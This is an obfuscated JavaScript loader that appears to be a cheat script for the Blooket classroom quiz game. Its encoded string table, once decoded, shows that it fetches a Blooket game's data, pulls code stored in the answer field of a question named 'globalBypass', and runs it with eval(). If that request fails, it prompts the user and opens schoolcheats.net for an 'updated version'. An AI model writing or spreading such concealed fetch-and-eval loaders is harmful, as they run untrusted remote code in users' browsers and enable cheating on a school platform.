(function (_0xa94425, _0x467099) {
    const _0x5d3611 = _0xf560, _0x47cda9 = _0xa94425();
    while (!![]) {
        try {
            const _0x1d62cd = -parseInt(_0x5d3611(0x1df)) / (0x2 * 0x3ff + -0xd4f * -0x1 + -0x154c) + parseInt(_0x5d3611(0x1e1)) / (-0x4a5 + -0x10 * 0x89 + 0xd37) * (parseInt(_0x5d3611(0x1dc)) / (0x1c3c + 0xe5b + 0x14 * -0x221)) + -parseInt(_0x5d3611(0x1c8)) / (0x2 * -0xc78 + 0x943 + 0xfb1) * (parseInt(_0x5d3611(0x1be)) / (0xbe * -0x10 + 0x1 * 0x120b + -0x313 * 0x2)) + parseInt(_0x5d3611(0x1d8)) / (0x43 * -0x27 + 0x4f * 0x1b + 0x1e6) + -parseInt(_0x5d3611(0x1c9)) / (-0x17 * 0x25 + -0x6f * 0x25 + 0x1365) + parseInt(_0x5d3611(0x1b7)) / (-0x277 + 0xe9 * -0x2 + 0x5 * 0xdd) + parseInt(_0x5d3611(0x1d0)) / (0xa7a * 0x1 + -0x1cc2 + 0x61b * 0x3);
            if (_0x1d62cd === _0x467099)
                break;
            else
                _0x47cda9['push'](_0x47cda9['shift']());
        } catch (_0x434d61) {
            _0x47cda9['push'](_0x47cda9['shift']());
        }
    }
}(_0x4799, -0xea5 * -0x35 + 0x1 * 0x33236 + -0xf973 * 0x4), ((() => {
    const _0x45370f = _0xf560, _0x343df9 = {
            'DOgjh': function (_0x3cbcd1, _0x20de54) {
                return _0x3cbcd1 !== _0x20de54;
            },
            'GTXcf': function (_0x1aeb12, _0x230a37) {
                return _0x1aeb12(_0x230a37);
            },
            'XiBAo': _0x45370f(0x1cb) + _0x45370f(0x1de) + _0x45370f(0x1d6) + _0x45370f(0x1d7) + _0x45370f(0x1c4) + _0x45370f(0x1db),
            'ZPgpe': _0x45370f(0x1bc) + _0x45370f(0x1d4) + _0x45370f(0x1c6) + _0x45370f(0x1c0),
            'SQNjg': _0x45370f(0x1cc) + _0x45370f(0x1c5) + _0x45370f(0x1ba),
            'ogWsH': _0x45370f(0x1ce) + _0x45370f(0x1e2),
            'VSVOD': function (_0xed7257, _0x4f4b51) {
                return _0xed7257 + _0x4f4b51;
            },
            'UimDH': _0x45370f(0x1b9) + _0x45370f(0x1d3) + _0x45370f(0x1c1) + _0x45370f(0x1d5) + '=',
            'NqwfZ': function (_0xa2b359, _0x4468b2) {
                return _0xa2b359(_0x4468b2);
            }
        };
    try {
        const _0x26fba3 = _0x343df9[_0x45370f(0x1c3)], _0x2024eb = _0x343df9[_0x45370f(0x1cd)];
        _0x343df9[_0x45370f(0x1b6)](fetch, _0x343df9[_0x45370f(0x1cf)](_0x343df9[_0x45370f(0x1d1)], _0x26fba3))[_0x45370f(0x1bd)](_0x11d235 => {
            const _0x493759 = _0x45370f;
            if (_0x343df9[_0x493759(0x1e0)](_0x11d235[_0x493759(0x1da)], -0xd8b * 0x1 + -0x89 + 0x3b7 * 0x4)) {
                const _0x2a7fdc = _0x343df9[_0x493759(0x1b6)](confirm, _0x343df9[_0x493759(0x1bb)]);
                _0x2a7fdc && window[_0x493759(0x1dd)](_0x343df9[_0x493759(0x1ca)]);
                return;
            }
            return _0x11d235[_0x493759(0x1d9)]();
        })[_0x45370f(0x1bd)](_0x36a4f7 => {
            const _0x5e0692 = _0x45370f;
            _0x343df9[_0x5e0692(0x1b6)](eval, _0x36a4f7[_0x5e0692(0x1c2)][_0x5e0692(0x1bf)](_0x5a55b2 => _0x5a55b2[_0x5e0692(0x1b8)] == _0x2024eb)[-0x233f + -0x293 * 0x9 + -0x3a6a * -0x1][_0x5e0692(0x1c7)][0x96a + 0x14bc + -0x1e26 * 0x1]);
        });
    } catch (_0x2aad6a) {
        const _0x4ce7ff = _0x343df9[_0x45370f(0x1d2)](confirm, _0x343df9[_0x45370f(0x1bb)]);
        if (_0x4ce7ff)
            return window[_0x45370f(0x1dd)](_0x343df9[_0x45370f(0x1ca)]);
    }
})()));
function _0xf560(_0x1e1d21, _0x4f9908) {
    const _0x26b42a = _0x4799();
    return _0xf560 = function (_0x4a9a57, _0x59450e) {
        _0x4a9a57 = _0x4a9a57 - (-0x31 * -0x4 + -0x58c + 0x67e);
        let _0x42f74d = _0x26b42a[_0x4a9a57];
        return _0x42f74d;
    }, _0xf560(_0x1e1d21, _0x4f9908);
}
function _0x4799() {
    const _0x468937 = [
        '4a330b5570',
        '.net/blook',
        'answers',
        '4bbEmZk',
        '1966139NYrLUg',
        'ZPgpe',
        'Script\x20is\x20',
        '61ac5b3fe4',
        'ogWsH',
        'globalBypa',
        'VSVOD',
        '6530130RGlRQB',
        'UimDH',
        'NqwfZ',
        'i.blooket.',
        'hoolcheats',
        'mes?gameId',
        'Do\x20you\x20wan',
        't\x20to\x20get\x20t',
        '260640eaevXa',
        'json',
        'status',
        '\x20version?',
        '621090GDEGJg',
        'open',
        'outdated.\x20',
        '283293ttnqCc',
        'DOgjh',
        '2AlVkgY',
        'ssName',
        'GTXcf',
        '211968bONLdE',
        'question',
        'https://ap',
        '51e5',
        'XiBAo',
        'https://sc',
        'then',
        '1428215BhJJUH',
        'filter',
        'et/',
        'com/api/ga',
        'questions',
        'SQNjg',
        'he\x20updated'
    ];
    _0x4799 = function () {
        return _0x468937;
    };
    return _0x4799();
}
